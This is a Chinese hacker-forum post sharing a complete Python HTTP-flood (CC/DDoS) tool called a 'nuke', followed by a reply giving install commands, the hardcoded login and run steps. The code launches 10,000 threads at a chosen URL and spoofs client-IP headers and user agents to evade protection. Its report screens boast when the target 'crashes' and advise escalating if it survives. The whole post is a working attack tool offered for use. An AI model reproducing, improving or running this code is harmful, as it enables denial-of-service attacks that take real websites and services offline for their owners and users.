wbhd

450 1
Zephyr 2025-12-7 13:05:14 来自手机 | 显示全部楼层 |阅读模式
#!/usr/bin/env python3
# 帝兵-筷子 | CC攻击核弹版
# 作者: 跨紫大帝
# 特性:专注HTTP Flood,一个攻击打穿一切

import os
import sys
import time
import socket
import random
import threading
import ssl
import asyncio
import aiohttp
import requests
from datetime import datetime
from urllib.parse import urlparse, urljoin
from concurrent.futures import ThreadPoolExecutor
from fake_useragent import UserAgent

# ========== 验证系统 ==========
class AuthSystem:
    @staticmethod
    def verify():
        os.system('clear')
        print("\033[91m" + "="*80 + "\033[0m")
        print("\033[91m\033[1m")
        print("    ╔══════════════════════════════════════════════╗")
        print("    ║          帝兵-筷子 | CC攻击核弹版           ║")
        print("    ╚══════════════════════════════════════════════╝")
        print("\033[0m\033[93m" + "="*80 + "\033[0m")
        
        username = input("\033[92m[?] 用户名: \033[0m").strip()
        password = input("\033[92m[?] 密码: \033[0m").strip()
        
        if username == "cs" and password == "cs666":
            print("\033[92m[✓] 验证成功!启动核武器系统\033[0m")
            time.sleep(1)
            return True
        print("\033[91m[✗] 验证失败\033[0m")
        return False

# ========== 目标获取 ==========
def get_target():
    print("\n\033[94m" + "="*80 + "\033[0m")
    target = input("\033[92m[?] 目标URL: \033[0m").strip()
   
    if not target.startswith(('http://', 'https://')):
        target = 'http://' + target
   
    # 确认目标
    print(f"\033[93m[!] 目标锁定: {target}\033[0m")
    confirm = input("\033[91m[?] 确认毁灭此目标? (y/N): \033[0m").lower()
   
    return target if confirm == 'y' else None

# ========== CC攻击核武器核心 ==========
class CCCannon:
    """CC攻击核武器 - 专注一个攻击,做到极致"""
   
    def __init__(self, target_url):
        self.target = target_url
        parsed = urlparse(target_url)
        self.host = parsed.netloc
        self.base_url = f"{parsed.scheme}://{parsed.netloc}"
        self.path = parsed.path if parsed.path else '/'
        
        # 攻击参数(可调节威力)
        self.max_threads = 10000      # 最大线程数
        self.requests_per_second = 50000  # 目标请求/秒
        self.attack_duration = 300    # 攻击持续时间(秒)
        
        # 统计数据
        self.stats = {
            'total_requests': 0,
            'successful_requests': 0,
            'failed_requests': 0,
            'start_time': None,
            'peak_rps': 0
        }
        
        # 用户代理池
        self.ua = UserAgent()
        self.user_agents = []
        self._init_user_agents()
        
        # 攻击路径池
        self.attack_paths = self._generate_attack_paths()
        
        print(f"\033[91m[⚡] CC核武器已装载\033[0m")
        print(f"\033[93m[🎯] 目标: {self.target}\033[0m")
        print(f"\033[93m[⚙️] 配置: {self.max_threads}线程 | {self.requests_per_second}请求/秒 | {self.attack_duration}秒\033[0m")
   
    def _init_user_agents(self):
        """初始化用户代理池"""
        agents = []
        for _ in range(100):
            try:
                agents.append(self.ua.random)
            except:
                agents.append('Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36')
        self.user_agents = agents
   
    def _generate_attack_paths(self):
        """生成攻击路径池"""
        paths = [self.path]
        
        # 常见Web路径
        common_paths = [
            '/', '/index.php', '/home', '/main',
            '/wp-admin/admin-ajax.php',
            '/admin/login.php', '/admin/index.php',
            '/api/v1/users', '/api/auth/login',
            '/search', '/search.php',
            '/product', '/products',
            '/user', '/users',
            '/data', '/report',
            '/upload', '/uploads',
            '/config', '/configuration'
        ]
        
        # 添加随机参数
        for path in common_paths[:50]:  # 取前50个
            # 添加随机查询参数
            param_count = random.randint(1, 5)
            params = []
            for i in range(param_count):
                param_name = f"p{random.randint(1000,9999)}"
                param_value = ''.join(random.choices('abcdefghijklmnopqrstuvwxyz', k=random.randint(5, 50)))
                params.append(f"{param_name}={param_value}")
            
            full_path = f"{path}?{'&'.join(params)}"
            paths.append(full_path)
        
        return paths
   
    def _get_random_headers(self):
        """生成随机请求头"""
        headers = {
            'User-Agent': random.choice(self.user_agents),
            'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8',
            'Accept-Language': random.choice(['zh-CN,zh;q=0.9', 'en-US,en;q=0.9', 'ja-JP,ja;q=0.9']),
            'Accept-Encoding': 'gzip, deflate, br',
            'Connection': random.choice(['keep-alive', 'close']),
            'Cache-Control': random.choice(['no-cache', 'max-age=0']),
            'Upgrade-Insecure-Requests': '1',
            'Sec-Fetch-Dest': 'document',
            'Sec-Fetch-Mode': 'navigate',
            'Sec-Fetch-Site': 'none',
            'Sec-Fetch-User': '?1',
            'Pragma': 'no-cache',
            'X-Requested-With': random.choice(['XMLHttpRequest', '']),
            'X-Forwarded-For': f"{random.randint(1,255)}.{random.randint(1,255)}.{random.randint(1,255)}.{random.randint(1,255)}",
            'X-Real-IP': f"{random.randint(1,255)}.{random.randint(1,255)}.{random.randint(1,255)}.{random.randint(1,255)}",
            'CF-Connecting-IP': f"{random.randint(1,255)}.{random.randint(1,255)}.{random.randint(1,255)}.{random.randint(1,255)}",
            'X-Client-IP': f"{random.randint(1,255)}.{random.randint(1,255)}.{random.randint(1,255)}.{random.randint(1,255)}",
            'True-Client-IP': f"{random.randint(1,255)}.{random.randint(1,255)}.{random.randint(1,255)}.{random.randint(1,255)}",
            'X-Cluster-Client-IP': f"{random.randint(1,255)}.{random.randint(1,255)}.{random.randint(1,255)}.{random.randint(1,255)}"
        }
        
        # 随机添加更多头
        if random.random() > 0.5:
            headers['Referer'] = random.choice([
                'https://www.google.com/',
                'https://www.baidu.com/',
                'https://www.bing.com/',
                'https://www.facebook.com/',
                self.base_url
            ])
        
        return headers
   
    def _make_request(self, session):
        """执行单个HTTP请求"""
        try:
            # 随机选择路径
            path = random.choice(self.attack_paths)
            url = f"{self.base_url.rstrip('/')}{path}"
            
            # 随机请求方法
            method = random.choices(['GET', 'POST', 'HEAD'], weights=[0.7, 0.2, 0.1])[0]
            
            headers = self._get_random_headers()
            
            # 对于POST请求,添加随机数据
            data = None
            if method == 'POST':
                data = {
                    f'field{random.randint(1,10)}': ''.join(random.choices('abcdefghijklmnopqrstuvwxyz0123456789', k=random.randint(10, 100)))
                }
            
            # 设置超时(故意设置很短)
            timeout = random.uniform(0.5, 2.0)
            
            # 发送请求
            if method == 'GET':
                response = session.get(url, headers=headers, timeout=timeout, verify=False)
            elif method == 'POST':
                response = session.post(url, headers=headers, data=data, timeout=timeout, verify=False)
            else:  # HEAD
                response = session.head(url, headers=headers, timeout=timeout, verify=False)
            
            self.stats['successful_requests'] += 1
            
            # 如果是重定向,跟随一次
            if response.status_code in [301, 302, 307, 308]:
                redirect_url = response.headers.get('Location', '')
                if redirect_url:
                    try:
                        session.get(redirect_url, timeout=1, verify=False)
                    except:
                        pass
            
            return True
            
        except Exception as e:
            self.stats['failed_requests'] += 1
            return False
   
    def _attack_worker(self, worker_id, stop_event):
        """攻击工作线程"""
        # 每个线程使用独立的session
        session = requests.Session()
        session.verify = False
        session.trust_env = False
        
        # 自定义适配器以提高性能
        from requests.adapters import HTTPAdapter
        adapter = HTTPAdapter(
            pool_connections=100,
            pool_maxsize=100,
            max_retries=0,
            pool_block=False
        )
        session.mount('http://', adapter)
        session.mount('https://', adapter)
        
        request_count = 0
        start_time = time.time()
        
        while not stop_event.is_set() and (time.time() - start_time) < self.attack_duration:
            try:
                self._make_request(session)
                request_count += 1
                self.stats['total_requests'] += 1
               
                # 动态控制速率
                current_rps = self.stats['total_requests'] / max(1, (time.time() - self.stats['start_time']))
                if current_rps > self.stats['peak_rps']:
                    self.stats['peak_rps'] = current_rps
               
                # 轻微延迟以避免完全饱和CPU
                if request_count % 100 == 0:
                    time.sleep(0.001)
                    
            except Exception as e:
                continue
   
    def _stats_monitor(self, stop_event):
        """统计监控线程"""
        last_count = 0
        last_time = time.time()
        
        while not stop_event.is_set():
            time.sleep(1)
            
            current_time = time.time()
            elapsed = current_time - self.stats['start_time']
            
            current_count = self.stats['total_requests']
            rps = (current_count - last_count) / (current_time - last_time)
            
            # 更新显示
            os.system('clear' if os.name == 'posix' else 'cls')
            print("\033[91m" + "="*80 + "\033[0m")
            print("\033[91m\033[1m          帝兵-筷子 | CC攻击进行中           \033[0m")
            print("\033[91m" + "="*80 + "\033[0m")
            
            print(f"\033[93m[🎯] 目标: {self.target}\033[0m")
            print(f"\033[93m[⏱️] 已运行: {int(elapsed)}秒 / {self.attack_duration}秒\033[0m")
            print(f"\033[93m[📊] 总请求: {self.stats['total_requests']:,}\033[0m")
            print(f"\033[93m[✅] 成功: {self.stats['successful_requests']:,}\033[0m")
            print(f"\033[93m[❌] 失败: {self.stats['failed_requests']:,}\033[0m")
            print(f"\033[93m[⚡] 实时RPS: {rps:,.0f}\033[0m")
            print(f"\033[93m[📈] 峰值RPS: {self.stats['peak_rps']:,.0f}\033[0m")
            print(f"\033[93m[🧵] 活跃线程: {threading.active_count() - 2}\033[0m")
            
            # 攻击效果评估
            success_rate = (self.stats['successful_requests'] / max(1, self.stats['total_requests'])) * 100
            if success_rate < 10:
                print(f"\033[92m[💥] 效果: 极佳 (目标可能已崩溃)\033[0m")
            elif success_rate < 30:
                print(f"\033[92m[🔥] 效果: 良好 (目标压力巨大)\033[0m")
            elif success_rate < 50:
                print(f"\033[93m[⚠️] 效果: 一般 (目标仍在抵抗)\033[0m")
            else:
                print(f"\033[91m[💢] 效果: 较差 (目标防护较强)\033[0m")
            
            print("\033[91m" + "="*80 + "\033[0m")
            print("\033[93m[⏸️] 按 Ctrl+C 停止攻击\033[0m")
            
            last_count = current_count
            last_time = current_time
   
    def fire(self):
        """发射CC核武器"""
        print("\033[91m[🔥] 启动CC核武器攻击...\033[0m")
        time.sleep(2)
        
        self.stats['start_time'] = time.time()
        stop_event = threading.Event()
        
        # 启动监控线程
        monitor_thread = threading.Thread(target=self._stats_monitor, args=(stop_event,))
        monitor_thread.daemon = True
        monitor_thread.start()
        
        # 创建线程池
        threads = []
        print(f"\033[93m[⚙️] 正在启动 {self.max_threads} 个攻击线程...\033[0m")
        
        # 分批启动线程,避免瞬间资源耗尽
        batch_size = 500
        for batch in range(0, self.max_threads, batch_size):
            for i in range(batch, min(batch + batch_size, self.max_threads)):
                thread = threading.Thread(
                    target=self._attack_worker,
                    args=(i, stop_event),
                    daemon=True
                )
                thread.start()
                threads.append(thread)
            
            time.sleep(0.5)  # 批次间延迟
        
        print(f"\033[92m[✓] 所有 {len(threads)} 个攻击线程已启动\033[0m")
        
        try:
            # 等待攻击时间结束
            time.sleep(self.attack_duration)
            
        except KeyboardInterrupt:
            print("\n\033[93m[!] 用户中断攻击\033[0m")
        
        finally:
            # 停止攻击
            stop_event.set()
            time.sleep(2)  # 给线程清理时间
            
            # 生成最终报告
            self._generate_report()
   
    def _generate_report(self):
        """生成攻击报告"""
        elapsed = time.time() - self.stats['start_time']
        avg_rps = self.stats['total_requests'] / max(1, elapsed)
        success_rate = (self.stats['successful_requests'] / max(1, self.stats['total_requests'])) * 100
        
        os.system('clear' if os.name == 'posix' else 'cls')
        print("\033[91m" + "="*80 + "\033[0m")
        print("\033[91m\033[1m          帝兵-筷子 | CC攻击完成报告           \033[0m")
        print("\033[91m" + "="*80 + "\033[0m")
        
        print(f"\n\033[93m[🎯] 攻击目标: {self.target}\033[0m")
        print(f"\033[93m[⏱️] 攻击时长: {elapsed:.1f}秒\033[0m")
        print(f"\033[93m[📊] 总请求数: {self.stats['total_requests']:,}\033[0m")
        print(f"\033[93m[📈] 平均RPS: {avg_rps:,.0f}\033[0m")
        print(f"\033[93m[⚡] 峰值RPS: {self.stats['peak_rps']:,.0f}\033[0m")
        print(f"\033[93m[✅] 成功率: {success_rate:.1f}%\033[0m")
        print(f"\033[93m[🧵] 最大线程: {self.max_threads}\033[0m")
        
        print("\n\033[94m" + "="*80 + "\033[0m")
        print("\033[94m\033[1m攻击效果评估:\033[0m")
        
        if success_rate < 10:
            print("\033[92m[💀] 毁灭级: 目标几乎肯定已崩溃\033[0m")
            print("\033[92m    服务器可能: 1) 完全无响应 2) 返回大量50x错误 3) 连接被拒绝\033[0m")
        elif success_rate < 30:
            print("\033[92m[🔥] 重度打击: 目标承受巨大压力\033[0m")
            print("\033[92m    服务器可能: 1) 响应极慢 2) 间歇性超时 3) 部分功能失效\033[0m")
        elif success_rate < 50:
            print("\033[93m[⚠️] 中度影响: 目标受到明显压力\033[0m")
            print("\033[93m    服务器可能: 1) 响应延迟 2) 偶尔超时 3) 基本功能正常\033[0m")
        else:
            print("\033[91m[💢] 轻微影响: 目标防护较强\033[0m")
            print("\033[91m    建议: 1) 增加线程数 2) 延长攻击时间 3) 结合其他攻击向量\033[0m")
        
        print("\033[91m" + "="*80 + "\033[0m")
        
        # 保存报告
        timestamp = datetime.now().strftime("%Y%m%d_%H%M%S")
        with open(f"cc_attack_report_{timestamp}.txt", 'w') as f:
            f.write(f"CC攻击报告 - 帝兵-筷子\n")
            f.write(f"{'='*60}\n")
            f.write(f"目标: {self.target}\n")
            f.write(f"时间: {datetime.now().strftime('%Y-%m-%d %H:%M:%S')}\n")
            f.write(f"时长: {elapsed:.1f}秒\n")
            f.write(f"总请求: {self.stats['total_requests']:,}\n")
            f.write(f"平均RPS: {avg_rps:.0f}\n")
            f.write(f"峰值RPS: {self.stats['peak_rps']:.0f}\n")
            f.write(f"成功率: {success_rate:.1f}%\n")
        
        print(f"\033[92m[💾] 报告已保存: cc_attack_report_{timestamp}.txt\033[0m")

# ========== 主程序 ==========
def main():
    # 验证
    if not AuthSystem.verify():
        return
   
    # 获取目标
    target = get_target()
    if not target:
        print("\033[93m[!] 未指定目标,程序退出\033[0m")
        return
   
    try:
        # 创建CC核武器
        cannon = CCCannon(target)
        
        # 确认发射
        print("\n\033[91m" + "="*80 + "\033[0m")
        confirm = input("\033[91m\033[1m[?] 确认发射CC核武器? (输入'FIRE'确认): \033[0m").strip()
        
        if confirm.upper() == 'FIRE':
            cannon.fire()
        else:
            print("\033[93m[!] 发射取消\033[0m")
            
    except KeyboardInterrupt:
        print("\n\033[93m[!] 程序被用户中断\033[0m")
    except Exception as e:
        print(f"\033[91m[!] 错误: {e}\033[0m")

if __name__ == "__main__":
    # 检查依赖
    try:
        import requests
        from fake_useragent import UserAgent
    except ImportError:
        print("\033[91m[!] 缺少依赖,请安装:\033[0m")
        print("\033[93m    pip install requests fake_useragent\033[0m")
        sys.exit(1)
   
    # 运行主程序
    main()
Zephyr 2025-12-7 13:06:29 来自手机 | 显示全部楼层
# 安装依赖
pip install requests fake_useragent

# 运行程序
python3 cc_nuke.py

# 输入信息:
# 用户名: cs
# 密码: cs666
# 目标URL: http://目标网站.com
# 确认: 输入 FIRE
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Zephyr

特级红客

关注
  • 74
    主题
  • 4
    粉丝
  • 79
    关注
这家伙很懒,什么都没留下!

中国红客联盟公众号

联系站长QQ:5520533

admin@chnhonker.com
Copyright © 2001-2026 Discuz Team. Powered by Discuz! X3.5 ( 粤ICP备13060014号 )|天天打卡 本站已运行